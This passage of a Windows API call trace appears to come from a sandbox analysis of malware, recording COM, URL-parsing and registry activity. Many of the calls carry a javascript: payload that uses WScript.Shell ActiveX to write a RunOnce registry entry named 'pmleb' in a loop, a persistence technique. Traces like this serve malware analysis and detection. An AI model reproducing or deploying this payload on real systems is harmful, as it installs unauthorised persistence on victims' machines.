(nIndex=35) returned 0x0 [0066.659] GetSysColor (nIndex=36) returned 0x0 [0066.659] GetSysColor (nIndex=37) returned 0x0 [0066.659] GetSysColor (nIndex=38) returned 0x0 [0066.659] GetSysColor (nIndex=39) returned 0x0 
[0066.659] GetSysColor (nIndex=40) returned 0x0 [0066.659] GetSysColor (nIndex=41) returned 0x0 [0066.659] GetSysColor (nIndex=42) returned 0x0 [0066.659] GetSysColor (nIndex=43) returned 0x0 [0066.659] GetSysColor (nIndex=44) returned 0x0 [0066.659] GetSysColor (nIndex=45) returned 0x0 [0066.659] GetSysColor (nIndex=46) returned 0x0 [0066.659] GetSysColor (nIndex=47) returned 0x0 [0066.659] GetSysColor (nIndex=48) returned 0x0 [0066.659] GetSysColor (nIndex=49) returned 0x0 [0066.659] GetSysColor (nIndex=50) returned 0x0 [0066.659] GetSysColor (nIndex=51) returned 0x0 [0066.659] GetSysColor (nIndex=52) returned 0x0 [0066.659] GetSysColor (nIndex=53) returned 0x0 [0066.659] GetSysColor (nIndex=54) returned 0x0 [0066.659] GetSysColor (nIndex=55) returned 0x0 [0066.659] GetSysColor (nIndex=56) returned 0x0 [0066.659] GetSysColor (nIndex=57) returned 0x0 [0066.659] GetSysColor (nIndex=58) returned 0x0 [0066.659] GetSysColor (nIndex=59) returned 0x0 [0066.659] GetSysColor (nIndex=60) returned 0x0 [0066.659] GetSysColor (nIndex=61) returned 0x0 [0066.659] GetSysColor (nIndex=62) returned 0x0 [0066.659] GetSysColor (nIndex=63) returned 0x0 [0066.659] GetDeviceCaps (hdc=0x1b0101ce, index=38) returned 32409 [0066.659] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.660] GetCurrentThreadId () returned 0x544 [0066.660] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bc28 [0066.660] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x50) returned 0x7a3230 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77d9d0 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x77d3f8 [0066.661] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.661] GetCurrentThreadId () returned 0x544 [0066.661] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77d9d0 | out: hHeap=0x760000) returned 1 [0066.661] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 
0x7a4508 [0066.661] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33f350 | out: ppu=0x33f350) returned 0x0 [0066.662] CreateUri (in: pwzURI="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x33f334 | out: ppURI=0x33f334*=0x78c78c) returned 0x0 [0066.662] IUnknown:AddRef (This=0x78c78c) returned 0x6 [0066.662] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f2d4, dwFlags=0x0 | out: pdwZone=0x33f2d4*=0xffffffff) returned 0x800c0011 [0066.662] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eba8 | out: ppv=0x33eba8*=0x75028d20) returned 0x0 [0066.662] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ec94 | out: ppvObject=0x33ec94*=0x75028d2c) returned 0x0 [0066.663] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.663] IInternetProtocolInfo:ParseUrl 
(in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x7a4710, cchResult=0xfe, pcchResult=0x33ecdc, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33ecdc*=0xfe) returned 0x0 [0066.663] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x200) returned 0x7a4918 [0066.663] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a4918 | out: hHeap=0x760000) returned 1 [0066.663] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.663] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33eba8 | out: ppv=0x33eba8*=0x75028d20) returned 0x0 [0066.663] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ec94 | out: ppvObject=0x33ec94*=0x75028d2c) returned 0x0 [0066.664] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.664] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x7a4710, cchResult=0xfe, pcchResult=0x33ecec, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33ecec*=0x0) returned 0x800c0011 [0066.664] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0066.664] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0066.664] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x2700, pPolicy=0x33f2d8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f2d8*=0x0) returned 0x0 [0066.664] IUnknown:Release (This=0x78c78c) returned 0x5 [0066.664] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.665] IUnknown:AddRef (This=0x78c78c) returned 0x5 [0066.665] IUri:GetPropertyDWORD (in: This=0x78c78c, uriProp=0x11, pdwProperty=0x33f10c, dwFlags=0x0 | out: pdwProperty=0x33f10c*=0xf) returned 0x0 [0066.665] IInternetSecurityManager:GetSecurityId (in: This=0x796530, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f168, pcbSecurityId=0x33f164*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f168*=0x6a, pcbSecurityId=0x33f164*=0x101) 
returned 0x0 [0066.665] IInternetSecurityManager:GetSecurityId (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pbSecurityId=0x33f168, pcbSecurityId=0x33f164*=0x200, dwReserved=0x0 | out: pbSecurityId=0x33f168*=0x0, pcbSecurityId=0x33f164*=0x200) returned 0x800c0011 [0066.665] IUnknown:Release (This=0x78c78c) returned 0x4 [0066.665] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.665] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x101) returned 0x7a8618 [0066.665] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x33f38c, dwReserved=0x0 | out: ppIInternetSession=0x33f38c*=0x790188) returned 0x0 [0066.665] IInternetSession:RegisterNameSpace (This=0x790188, pCF=0x75028c50, rclsid=0x74c29790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.666] IUnknown:AddRef (This=0x75028c50) returned 0x1 [0066.666] IInternetSession:RegisterNameSpace (This=0x790188, pCF=0x75028c70, rclsid=0x74c29780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0066.666] IUnknown:AddRef (This=0x75028c70) returned 0x1 [0066.666] StrCmpICW (pszStr1="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pszStr2="res://ieframe.dll/PhishSite.htm") returned -8 [0066.666] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2fc | out: 
ppvObject=0x33f2fc*=0x78ca14) returned 0x0 [0066.666] IUnknown:Release (This=0x78ca14) returned 0x9 [0066.666] IUnknown:AddRef (This=0x78ca14) returned 0xa [0066.666] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12c) returned 0x7a8728 [0066.667] IUnknown:AddRef (This=0x78ca14) returned 0xb [0066.667] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2c0 | out: ppvObject=0x33f2c0*=0x78ca14) returned 0x0 [0066.667] IUnknown:Release (This=0x78ca14) returned 0xb [0066.667] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.667] IUnknown:Release (This=0x78ca14) returned 0xb [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x3c) returned 0x774448 [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x7a8860 [0066.667] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77d9d0 [0066.667] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33f344 | out: pdwScheme=0x33f344*=0xf) returned 0x0 [0066.668] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f34c | out: ppvObject=0x33f34c*=0x78ca14) returned 0x0 [0066.668] IUnknown:Release (This=0x78ca14) returned 0xb [0066.668] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.668] IUnknown:Release (This=0x78ca14) returned 0xb [0066.668] IUri:IsEqual (in: This=0x78c78c, pUri=0x78ca14, pfEqual=0x33f38c | out: pfEqual=0x33f38c*=1) returned 0x0 [0066.668] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3288 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x12) returned 0x7a1fd8 [0066.668] RtlAllocateHeap 
(HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7a8d00 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x30) returned 0x77da40 [0066.668] PostMessageW (hWnd=0x20280, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0066.668] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x12c) returned 0x7a8d68 [0066.668] IUnknown:AddRef (This=0x78ca14) returned 0xc [0066.668] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33f2e0 | out: ppvObject=0x33f2e0*=0x78ca14) returned 0x0 [0066.669] IUnknown:Release (This=0x78ca14) returned 0xc [0066.669] IUnknown:AddRef (This=0x78ca14) returned 0xd [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a32e0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x68) returned 0x7a8ea0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x108) returned 0x7a27a0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78bbb0 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xcc) returned 0x78ce40 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x78b940 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0066.669] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1b0) returned 0x7a28b0 [0066.669] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efe4 | out: ppvObject=0x33efe4*=0x78ca14) returned 0x0 [0066.669] IUnknown:Release (This=0x78ca14) returned 0xd [0066.669] IUnknown:AddRef (This=0x78ca14) returned 0xe [0066.669] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0066.669] IUnknown:AddRef 
(This=0x78ca14) returned 0xf [0066.670] IUnknown:AddRef (This=0x78ca14) returned 0x10 [0066.670] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efd8 | out: ppvObject=0x33efd8*=0x78ca14) returned 0x0 [0066.670] IUnknown:Release (This=0x78ca14) returned 0x10 [0066.670] IUnknown:AddRef (This=0x78ca14) returned 0x11 [0066.670] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x7a29b8 | out: pdwScheme=0x7a29b8*=0xf) returned 0x0 [0066.670] IMoniker:IsSystemMoniker (in: This=0x78af40, pdwMksys=0x33f040 | out: pdwMksys=0x33f040*=0x6) returned 0x0 [0066.743] IUri:GetSchemeName (in: This=0x78ca14, pbstrSchemeName=0x33ef98 | out: pbstrSchemeName=0x33ef98*="javascript") returned 0x0 [0066.743] _wcsnicmp (_String1="javas", _String2="data", _MaxCount=0x5) returned 6 [0066.743] IUri:GetScheme (in: This=0x78ca14, pdwScheme=0x33efe4 | out: pdwScheme=0x33efe4*=0xf) returned 0x0 [0066.743] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efa4 | out: ppvObject=0x33efa4*=0x78ca14) returned 0x0 [0066.743] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.743] IUnknown:AddRef (This=0x78ca14) returned 0x12 [0066.743] CoInternetQueryInfo (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", QueryOptions=0xd, dwQueryFlags=0x0, pvBuffer=0x33efd4, cbBuffer=0x4, pcbBuffer=0x33efcc, dwReserved=0x0 | out: pvBuffer=0x33efd4*, pcbBuffer=0x33efcc*=0x4) returned 0x0 [0066.744] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, 
Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33ee5c | out: ppv=0x33ee5c*=0x75028d20) returned 0x0 [0066.744] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x75028d2c) returned 0x0 [0066.744] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.750] CoInternetParseUrl (in: pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=0x13, dwFlags=0x0, pszResult=0x33cf08, cchResult=0x1000, pcchResult=0x33cf04, dwReserved=0x0 | out: pszResult="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pcchResult=0x33cf04) returned 0x0 [0066.750] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33cd98 | out: ppv=0x33cd98*=0x75028d20) returned 0x0 [0066.751] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ce84 | out: ppvObject=0x33ce84*=0x75028d2c) returned 
0x0 [0066.751] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.751] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=19, dwParseFlags=0x0, pwzResult=0x33cf08, cchResult=0x1000, pcchResult=0x33cf04, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33cf04*=0x0) returned 0x800c0011 [0066.751] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.751] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ppu=0x33ced4 | out: ppu=0x33ced4) returned 0x0 [0066.842] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.842] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.842] IUnknown:QueryInterface (in: This=0x78ca14, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33efe4 | out: ppvObject=0x33efe4*=0x78ca14) returned 0x0 [0066.843] IUnknown:Release (This=0x78ca14) returned 0x11 [0066.843] IUnknown:AddRef (This=0x78ca14) returned 0x12 [0066.843] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a3338 [0066.843] GetCurrentThreadId () returned 0x544 [0066.843] CreateBindCtx (in: reserved=0x0, ppbc=0x33f028 | out: ppbc=0x33f028*=0x7a08d0) returned 0x0 [0066.844] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc) returned 0x79dbd8 [0066.844] IUnknown:AddRef (This=0x7a08d0) returned 0x2 [0066.844] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x1c) returned 0x790a18 [0066.844] RegOpenKeyExW (in: 
hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ef0c | out: phkResult=0x33ef0c*=0x1c8) returned 0x0 [0066.844] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33ef10 | out: phkResult=0x33ef10*=0x14c) returned 0x0 [0066.844] RegOpenKeyExW (in: hKey=0x14c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33eecc | out: phkResult=0x33eecc*=0x0) returned 0x2 [0066.845] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x33eecc | out: phkResult=0x33eecc*=0x1cc) returned 0x0 [0066.845] SHRegGetValueW () returned 0x2 [0066.845] SHRegGetValueW () returned 0x2 [0066.845] RegCloseKey (hKey=0x1cc) returned 0x0 [0066.845] RegCloseKey (hKey=0x0) returned 0x6 [0066.845] RegCloseKey (hKey=0x0) returned 0x6 [0066.845] RegCloseKey (hKey=0x1c8) returned 0x0 [0066.845] RegCloseKey (hKey=0x14c) returned 0x0 [0066.846] RegisterBindStatusCallback (in: pBC=0x7a08d0, pBSCb=0x7a28c0, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.846] IUnknown:AddRef (This=0x7a28c0) returned 0x4 [0066.846] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x33ef74 | out: ppvObject=0x33ef74*=0x7a28c4) returned 0x0 [0066.846] IMoniker:RemoteBindToStorage (in: This=0x78af40, pbc=0x7a08d0, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x33efc0 | out: ppvObj=0x33efc0*=0x0) returned 0x401e8 [0066.847] DllGetClassObject (in: rclsid=0x79224c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 
[6]=0x0, [7]=0x46)), ppv=0x33eaf8 | out: ppv=0x33eaf8*=0x75028d20) returned 0x0 [0066.848] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x33ebe4 | out: ppvObject=0x33ebe4*=0x75028d2c) returned 0x0 [0066.848] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.848] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x7a9710, cchResult=0x824, pcchResult=0x33eef8, dwReserved=0x0 | out: pwzResult="", pcchResult=0x33eef8*=0x0) returned 0x800c0011 [0066.848] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.848] IUnknown:QueryInterface (in: This=0x7a28c0, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x33ee88 | out: ppvObject=0x33ee88*=0x7a28c0) returned 0x0 [0066.848] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x7a28c0, grfBINDF=0x7a2f6c, pbindinfo=0x7a301c, pstgmed=0x7a2f70, grfBINDF2=0x33eed4, pdwReserved=0x80004005 | out: grfBINDF=0x7a2f6c*=0x83, pbindinfo=0x7a301c, pstgmed=0x7a2f70, grfBINDF2=0x33eed4*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.848] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33eda8 | out: phkResult=0x33eda8*=0x14c) returned 0x0 [0066.849] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x33edac | out: phkResult=0x33edac*=0x1c8) 
